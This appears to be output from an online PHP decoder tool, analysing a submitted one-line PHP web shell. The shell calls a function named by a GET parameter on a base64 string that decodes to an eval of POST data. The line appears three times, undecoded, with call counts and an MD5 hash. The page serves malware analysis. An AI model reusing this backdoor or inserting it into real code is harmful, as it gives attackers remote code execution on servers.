Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php call_user_func($_GET['dede'], base64_decode('QGV2YWwoJF9QT1NUW2JzXSk7')); ?>..
Decoded Output download
<?php
call_user_func($_GET['dede'], base64_decode('QGV2YWwoJF9QT1NUW2JzXSk7'));
?>
Did this file decode correctly?
Original Code
<?php
call_user_func($_GET['dede'], base64_decode('QGV2YWwoJF9QT1NUW2JzXSk7'));
?>
Function Calls
null | 1 |
base64_decode | 1 |
call_user_func | 1 |
Stats
MD5 | 0ca0a94457cb7b8b84b4549614eb0e62 |
Eval Count | 0 |
Decode Time | 97 ms |